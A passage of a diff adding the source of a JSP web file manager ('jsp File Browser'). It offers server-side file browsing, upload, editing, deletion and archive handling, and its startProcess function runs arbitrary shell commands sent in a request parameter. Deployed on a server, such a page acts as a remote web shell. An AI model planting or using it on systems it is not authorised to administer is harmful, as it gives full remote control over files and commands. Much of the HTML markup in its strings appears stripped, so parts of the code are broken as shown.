+ else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html"; + else if (fName.endsWith(".avi")) return "video/x-msvideo"; + else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime"; + else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg"; + else if (fName.endsWith(".zip")) return "application/zip"; + else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff"; + else if (fName.endsWith(".rtf")) return "application/rtf"; + else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi"; + else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv") + || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt") + || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel"; + else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword"; + else if (fName.endsWith(".png")) return "image/png"; + else if (fName.endsWith(".xml")) return "text/xml"; + else if (fName.endsWith(".svg")) return "image/svg+xml"; + else if (fName.endsWith(".mp3")) return "audio/mp3"; + else if (fName.endsWith(".ogg")) return "audio/ogg"; + else return "text/plain"; + } + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String conv2Html(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } + + /** + * Starts a native process on the server + * @param command the command to start the process + * @param dir the dir in which the process starts + */ + static String startProcess(String command, String dir) throws IOException { + StringBuffer ret = new StringBuffer(); + String[] comm = new String[3]; + comm[0] = COMMAND_INTERPRETER[0]; + comm[1] = COMMAND_INTERPRETER[1]; + comm[2] = command; + long start = System.currentTimeMillis(); + try { + //Start process + Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir)); + //Get input and error streams + BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream()); + BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream()); + boolean end = false; + while (!end) { + int c = 0; + while ((ls_err.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_err.read())); + } + c = 0; + while ((ls_in.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_in.read())); + } + try { + ls_proc.exitValue(); + //if the process has not finished, an exception is thrown + //else + while (ls_err.available() > 0) + ret.append(conv2Html(ls_err.read())); + while (ls_in.available() > 0) + ret.append(conv2Html(ls_in.read())); + end = true; + } + catch (IllegalThreadStateException ex) { + //Process is running + } + //The process is not allowed to run longer than given time. + if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) { + ls_proc.destroy(); + end = true; + ret.append("!!!! Process has timed out, destroyed !!!!!"); + } + try { + Thread.sleep(50); + } + catch (InterruptedException ie) {} + } + } + catch (IOException e) { + ret.append("Error: " + e); + } + return ret.toString(); + } + + /** + * Converts a dir string to a linked dir string + * @param dir the directory string (e.g. /usr/local/httpd) + * @param browserLink web-path to Browser.jsp + */ + static String dir2linkdir(String dir, String browserLink, int sortMode) { + File f = new File(dir); + StringBuffer buf = new StringBuffer(); + while (f.getParentFile() != null) { + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getName()) + File.separator + ""); + } + else buf.insert(0, conv2Html(f.getName()) + File.separator); + f = f.getParentFile(); + } + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + ""); + } + else buf.insert(0, f.getAbsolutePath()); + return buf.toString(); + } + + /** + * Returns true if the given filename tends towards a packed file + */ + static boolean isPacked(String name, boolean gz) { + return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar") + || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase() + .endsWith(".war")); + } + + /** + * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not + */ + static boolean isAllowed(File path, boolean write) throws IOException{ + if (READ_ONLY && write) return false; + if (RESTRICT_BROWSING) { + StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";"); + while (stk.hasMoreTokens()){ + if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken())) + return RESTRICT_WHITELIST; + } + return !RESTRICT_WHITELIST; + } + else return true; + } + + //--------------------------------------------------------------------------------------------------------------- + + %> +<% + //Get the current browsing directory + request.setAttribute("dir", request.getParameter("dir")); + // The browser_name variable is used to keep track of the URI + // of the jsp file itself. It is used in all link-backs. + final String browser_name = request.getRequestURI(); + final String FOL_IMG = ""; + boolean nohtml = false; + boolean dir_view = true; + //Get Javascript + if (request.getParameter("Javascript") != null) { + dir_view = false; + nohtml = true; + //Tell the browser that it should cache the javascript + response.setHeader("Cache-Control", "public"); + Date now = new Date(); + SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US); + response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2))); + response.setHeader("Content-Type", "text/javascript"); + %> + <%// This section contains the Javascript used for interface elements %> + var check = false; + <%// Disables the checkbox feature %> + function dis(){check = true;} + + var DOM = 0, MS = 0, OP = 0, b = 0; + <%// Determine the browser type %> + function CheckBrowser(){ + if (b == 0){ + if (window.opera) OP = 1; + // Moz or Netscape + if(document.getElementById) DOM = 1; + // Micro$oft + if(document.all && !OP) MS = 1; + b = 1; + } + } + <%// Allows the whole row to be selected %> + function selrow (element, i){ + var erst; + CheckBrowser(); + if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild; + else if (DOM==1) erst = element.firstChild.nextSibling.firstChild; + <%// MouseIn %> + if (i==0){ + if (erst.checked == true) element.className='mousechecked'; + else element.className='mousein'; + } + <%// MouseOut %> + else if (i==1){ + if (erst.checked == true) element.className='checked'; + else element.className='mouseout'; + } + <% // MouseClick %> + else if ((i==2)&&(!check)){ + if (erst.checked==true) element.className='mousein'; + else element.className='mousechecked'; + erst.click(); + } + else check=false; + } + <%// Filter files and dirs in FileList%> + function filter (begriff){ + var suche = begriff.value.toLowerCase(); + var table = document.getElementById("filetable"); + var ele; + for (var r = 1; r < table.rows.length; r++){ + ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,""); + if (ele.toLowerCase().indexOf(suche)>=0 ) + table.rows[r].style.display = ''; + else table.rows[r].style.display = 'none'; + } + } + <%//(De)select all checkboxes%> + function AllFiles(){ + for(var x=0;x < document.FileList.elements.length;x++){ + var y = document.FileList.elements[x]; + var ytr = y.parentNode.parentNode; + var check = document.FileList.selall.checked; + if(y.name == 'selfile' && ytr.style.display != 'none'){ + if (y.disabled != true){ + y.checked = check; + if (y.checked == true) ytr.className = 'checked'; + else ytr.className = 'mouseout'; + } + } + } + } + + function shortKeyHandler(_event){ + if (!_event) _event = window.event; + if (_event.which) { + keycode = _event.which; + } else if (_event.keyCode) { + keycode = _event.keyCode; + } + var t = document.getElementById("text_Dir"); + //z + if (keycode == 122){ + document.getElementById("but_Zip").click(); + } + //r, F2 + else if (keycode == 113 || keycode == 114){ + var path = prompt("Please enter new filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Ren").click(); + } + //c + else if (keycode == 99){ + var path = prompt("Please enter filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NFi").click(); + } + //d + else if (keycode == 100){ + var path = prompt("Please enter directory name", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NDi").click(); + } + //m + else if (keycode == 109){ + var path = prompt("Please enter move destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Mov").click(); + } + //y + else if (keycode == 121){ + var path = prompt("Please enter copy destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Cop").click(); + } + //l + else if (keycode == 108){ + document.getElementById("but_Lau").click(); + } + //Del + else if (keycode == 46){ + document.getElementById("but_Del").click(); + } + } + + function popUp(URL){ + fname = document.getElementsByName("myFile")[0].value; + if (fname != "") + window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes") + } + + document.onkeypress = shortKeyHandler; +<% } + // View file + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)) { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath()); + } + else if (f.exists() && f.canRead()) { + if (isPacked(f.getName(), false)) { + //If zipFile, do nothing here + } + else{ + String mimeType = getMimeType(f.getName()); + response.setContentType(mimeType); + if (mimeType.equals("text/plain")) response.setHeader( + "Content-Disposition", "inline;filename=\"temp.txt\""); + else response.setHeader("Content-Disposition", "inline;filename=\"" + + f.getName() + "\""); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + // Download selected files as zip file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) { + Vector v = expandFileList(request.getParameterValues("selfile"), false); + //Check if all files in vector are allowed + String notAllowedFile = null; + for (int i = 0;i < v.size(); i++){ + File f = (File) v.get(i); + if (!isAllowed(f, false)){ + notAllowedFile = f.getAbsolutePath(); + break; + } + } + if (notAllowedFile != null){ + request.setAttribute("error", "You are not allowed to access " + notAllowedFile); + } + else if (v.size() == 0) { + request.setAttribute("error", "No files selected"); + } + else { + File dir_file = new File("" + request.getAttribute("dir")); + int dir_l = dir_file.getAbsolutePath().length(); + response.setContentType("application/zip"); + response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\""); + out.clearBuffer(); + ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out)); + zipout.setComment("Created by jsp File Browser v. " + VERSION_NR); + zipout.setLevel(COMPRESSION_LEVEL); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.canRead()) { + zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1))); + BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[0xffff]; + copyStreamsWithoutClose(fr, zipout, buffer); + /* int b; + while ((b=fr.read())!=-1) zipout.write(b);*/ + fr.close(); + zipout.closeEntry(); + } + } + zipout.finish(); + out.flush(); + nohtml = true; + dir_view = false; + } + } + // Download file + else if (request.getParameter("downfile") != null) { + String filePath = request.getParameter("downfile"); + File f = new File(filePath); + if (!isAllowed(f, false)){ + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile()); + } + else if (f.exists() && f.canRead()) { + response.setContentType("application/octet-stream"); + response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName() + + "\""); + response.setContentLength((int) f.length()); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + if (nohtml) return; + //else + // If no parameter is submitted, it will take the path from jsp file browser + if (request.getAttribute("dir") == null) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) { + File f = new File(application.getRealPath(request.getRequestURI())).getParentFile(); + //This is a hack needed for tomcat + while (f != null && !f.exists()) + f = f.getParentFile(); + if (f != null) + path = f.getAbsolutePath(); + } + if (path == null) { // handle the case where we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + } + //Check path + if (!isAllowed(new File(path), false)){ + //TODO Blacklist + if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH; + else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";")); + } + request.setAttribute("dir", path); + }%> + + + + + + + +<% + //If a cssfile exists, it will take it + String cssPath = null; + if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File( + application.getRealPath(request.getRequestURI())).getParent() + + File.separator + CSS_NAME; + if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString(); + if (new File(cssPath).exists()) { +%> + + <%} + else if (request.getParameter("uplMonitor") == null) {%> + + <%} + + //Check path + if (!isAllowed(new File((String)request.getAttribute("dir")), false)){ + request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir")); + } + //Upload monitor + else if (request.getParameter("uplMonitor") != null) {%> + <% + String fname = request.getParameter("uplMonitor"); + //First opening + boolean first = false; + if (request.getParameter("first") != null) first = true; + UplInfo info = new UplInfo(); + if (!first) { + info = UploadMonitor.getInfo(fname); + if (info == null) { + //Windows + int posi = fname.lastIndexOf("\\"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + if (info == null) { + //Unix + int posi = fname.lastIndexOf("/"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + } + dir_view = false; + request.setAttribute("dir", null); + if (info.aborted) { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

+Upload aborted. +<% + } + else if (info.totalSize != info.currSize || info.currSize == 0) { + %> + + + +Upload of <%=fname%>

+
+ + +
+<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%> +(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
+Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%> + +<% + } + else { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

+Upload finished. + +<% + } + } + //Comandwindow + else if (request.getParameter("command") != null) { + if (!NATIVE_COMMANDS){ + request.setAttribute("error", "Execution of native commands is not allowed!"); + } + else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) { +%> +Launch commands in <%=request.getAttribute("dir")%> + +
+

<%=LAUNCH_COMMAND %>


+<% + out.println("
\n" + + " + "> +

+ + + +
+ Command: +
+ "> +
+
+
+
+
+ jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
+
+ + +<% + dir_view = false; + request.setAttribute("dir", null); + } + } + + //Click on a filename, special viewer (zip+jar file) + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + else if (isPacked(f.getName(), false)) { + //ZipFile + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); +%> +<%= f.getAbsolutePath()%> + + +

Content of <%=conv2Html(f.getName())%>


+ + +<% + long size = 0; + int fileCount = 0; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory()) { + fileCount++; + size += entry.getSize(); + long ratio = 0; + if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) + / entry.getSize(); + out.println(""); + + } + } + zf.close(); + //No directory view + dir_view = false; + request.setAttribute("dir", null); +%> +
NameUncompressed sizeCompressed sizeCompr. ratioDate
" + conv2Html(entry.getName()) + + "" + convertFileSize(entry.getSize()) + "" + + convertFileSize(entry.getCompressedSize()) + "" + + ratio + "%" + "" + + dateFormat.format(new Date(entry.getTime())) + "
+

+ <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% +

+ +<% + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot read " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " + + ex); + } + } + } + // Upload + else if ((request.getContentType() != null) + && (request.getContentType().toLowerCase().startsWith("multipart"))) { + if (!ALLOW_UPLOAD){ + request.setAttribute("error", "Upload is forbidden!"); + } + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + boolean error = false; + try { + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser + .processData(request.getInputStream(), bound, tempdir, clength); + if (!isAllowed(new File((String)ht.get("dir")), false)){ + //This is a hack, cos we are writing to this directory + request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); + error = true; + } + else if (ht.get("myFile") != null) { + FileInfo fi = (FileInfo) ht.get("myFile"); + File f = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) { + f.delete(); + request.setAttribute("error", "Upload aborted"); + } + else { + // Move file from temp to the right dir + String path = (String) ht.get("dir"); + if (!path.endsWith(File.separator)) path = path + File.separator; + if (!f.renameTo(new File(path + f.getName()))) { + request.setAttribute("error", "Cannot upload file."); + error = true; + f.delete(); + } + } + } + else { + request.setAttribute("error", "No file selected for upload"); + error = true; + } + request.setAttribute("dir", (String) ht.get("dir")); + } + catch (Exception e) { + request.setAttribute("error", "Error " + e + ". Upload aborted"); + error = true; + } + if (!error) request.setAttribute("message", "File upload correctly finished."); + } + // The form to edit a text file + else if (request.getParameter("editfile") != null) { + File ef = new File(request.getParameter("editfile")); + if (!isAllowed(ef, true)){ + request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); + } + else{ +%> +Edit <%=conv2Html(request.getParameter("editfile"))%> + + +
+

Edit <%=conv2Html(request.getParameter("editfile"))%>


+<% + BufferedReader reader = new BufferedReader(new FileReader(ef)); + String disable = ""; + if (!ef.canWrite()) disable = " readonly"; + out.println("
\n" + + "

+ + "> + "> + + + + + + + +
>Ms-Dos/Windows + >Unix + Write backup
+
+ + "> + "> +
+
+
+
+
+ jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
+ + +<% + } + } + // Save or cancel the edited file + else if (request.getParameter("nfile") != null) { + File f = new File(request.getParameter("nfile")); + if (request.getParameter("Submit").equals("Save")) { + File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); + if (!isAllowed(new_f, true)){ + request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); + } + if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { + File bak = new File(new_f.getAbsolutePath() + ".bak"); + bak.delete(); + new_f.renameTo(bak); + } + if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", + "Cannot write to " + new_f.getName() + ", file is write protected."); + else { + BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); + StringReader text = new StringReader(request.getParameter("text")); + int i; + boolean cr = false; + String lineend = "\n"; + if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; + while ((i = text.read()) >= 0) { + if (i == '\r') cr = true; + else if (i == '\n') { + outs.write(lineend); + cr = false; + } + else if (cr) { + outs.write(lineend); + cr = false; + } + else { + outs.write(i); + cr = false; + } + } + outs.flush(); + outs.close(); + } + } + request.setAttribute("dir", f.getParent()); + } + //Unpack file to the current directory without overwriting + else if (request.getParameter("unpackfile") != null) { + File f = new File(request.getParameter("unpackfile")); + String root = f.getParent(); + request.setAttribute("dir", root); + if (!isAllowed(new File(root), true)){ + request.setAttribute("error", "You are not allowed to access " + root); + } + //Check if file exists + else if (!f.exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", file does not exist"); + } + //Check if directory is readonly + else if (!f.getParentFile().canWrite()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", directory is write protected."); + } + //GZip + else if (f.getName().toLowerCase().endsWith(".gz")) { + //New name is old Name without .gz + String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); + try { + byte buffer[] = new byte[0xffff]; + copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( + newName), buffer); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + //Else try Zip + else { + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); + //First check whether a file already exist + boolean error = false; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory() + && new File(root + File.separator + entry.getName()).exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", File " + entry.getName() + " already exists."); + error = true; + break; + } + } + if (!error) { + //Unpack File + entries = zf.entries(); + byte buffer[] = new byte[0xffff]; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + File n = new File(root + File.separator + entry.getName()); + if (entry.isDirectory()) n.mkdirs(); + else { + n.getParentFile().mkdirs(); + n.createNewFile(); + copyStreams(zf.getInputStream(entry), new FileOutputStream(n), + buffer); + } + } + zf.close(); + request.setAttribute("message", "Unpack of " + f.getName() + + " was successful."); + } + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + } + // Delete Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(DELETE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + boolean error = false; + //delete backwards + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + if (!f.canWrite() || !f.delete()) { + request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() + + ". Deletion aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); + else if (!error) request.setAttribute("error", "No files selected"); + } + // Create Directory + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_DIR))) { + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else if (new File(new_dir).mkdirs()) { + request.setAttribute("message", "Directory created"); + } + else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); + } + // Create a new empty file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_FILE))) { + String dir = "" + request.getAttribute("dir"); + String file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // Test, if file_name is empty + else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) { + if (new File(new_file).createNewFile()) request.setAttribute("message", + "File created"); + else request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); + } + // Rename a file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(RENAME_FILE))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String new_file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, new_file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // The error conditions: + // 1) Zero Files selected + else if (v.size() <= 0) request.setAttribute("error", + "Select exactly one file or folder. Rename failed"); + // 2a) Multiple files selected and the first isn't a dir + // Here we assume that expandFileList builds v from top-bottom, starting with the dirs + else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( + "error", "Select exactly one file or folder. Rename failed"); + // 2b) If there are multiple files from the same directory, rename fails + else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() + && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { + request.setAttribute("error", "Select exactly one file or folder. Rename failed"); + } + else { + File f = (File) v.get(0); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + // Test, if file_name is empty + else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { + if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { + request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("message", "Renamed file " + + ((File) v.get(0)).getName() + " to " + new_file); + } + else request.setAttribute("error", "Error: \"" + new_file_name + + "\" is not a valid filename"); + } + } + // Move selected file(s) + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(MOVE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), false)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + // This ensures that new_dir is a directory + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + else if (!f.canWrite() || !f.renameTo(new File(new_dir + + f.getAbsolutePath().substring(dir.length())))) { + request.setAttribute("error", "Cannot move " + f.getAbsolutePath() + + ". Move aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Copy Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(COPY_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = (String) request.getAttribute("dir"); + if (!dir.endsWith(File.separator)) dir += File.separator; + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + try { + byte buffer[] = new byte[0xffff]; + for (int i = 0; i < v.size(); i++) { + File f_old = (File) v.get(i); + File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); + if (!isAllowed(f_old, false)|| !isAllowed(f_new, true)){ + request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); + error = true; + } + else if (f_old.isDirectory()) f_new.mkdirs(); + // Overwriting is forbidden + else if (!f_new.exists()) { + copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); + } + else { + // File exists + request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() + + ", file already exists. Copying aborted"); + error = true; + break; + } + } + } + catch (IOException e) { + request.setAttribute("error", "Error " + e + ". Copying aborted"); + error = true; + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Directory viewer + if (dir_view && request.getAttribute("dir") != null) { + File f = new File("" + request.getAttribute("dir")); + //Check, whether the dir exists + if (!f.exists() || !isAllowed(f, false)) { + if (!f.exists()){ + request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); + } + else{ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + //if attribute olddir exists, it will change to olddir + if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")), false)) { + f = new File("" + request.getAttribute("olddir")); + } + //try to go to the parent dir + else { + if (f.getParent() != null && isAllowed(f, false)) f = new File(f.getParent()); + } + //If this dir also do also not exist, go back to browser.jsp root path + if (!f.exists()) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) path = new File( + application.getRealPath(request.getRequestURI())).getParent(); + + if (path == null) // handle the case were we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + f = new File(path); + } + if (isAllowed(f, false)) request.setAttribute("dir", f.getAbsolutePath()); + else request.setAttribute("dir", null); + } +%> + +<%=request.getAttribute("dir")%> + + +<% + //Output message + if (request.getAttribute("message") != null) { + out.println("
"); + out.println(request.getAttribute("message")); + out.println("
"); + } + //Output error + if (request.getAttribute("error") != null) { + out.println("
"); + out.println(request.getAttribute("error")); + out.println("
"); + } + if (request.getAttribute("dir") != null){ +%> + +
+ Filename filter: +

+ +<% + // Output the table, starting with the headers. + String dir = URLEncoder.encode("" + request.getAttribute("dir")); + String cmd = browser_name + "?dir=" + dir; + int sortMode = 1; + if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request + .getParameter("sort")); + int[] sort = new int[] {1, 2, 3, 4}; + for (int i = 0; i < sort.length; i++) + if (sort[i] == sortMode) sort[i] = -sort[i]; + out.print("" + + "" + + "" + + "" + + ""); + if (!READ_ONLY) out.print (""); + out.println(""); + char trenner = File.separatorChar; + // Output the Root-Dirs, without FORBIDDEN_DRIVES + File[] entry = File.listRoots(); + for (int i = 0; i < entry.length; i++) { + boolean forbidden = false; + for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { + if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; + } + if (!forbidden) { + out.println(""); + out.println(""); + } + } + // Output the parent directory link ".." + if (f.getParent() != null) { + out.println(""); + out.println(""); + } + // Output all files and dirs and calculate the number of files and total size + entry = f.listFiles(); + if (entry == null) entry = new File[] {}; + long totalSize = 0; // The total size of the files in the current directory + long fileCount = 0; // The count of files in the current working directory + if (entry != null && entry.length > 0) { + Arrays.sort(entry, new FileComp(sortMode)); + for (int i = 0; i 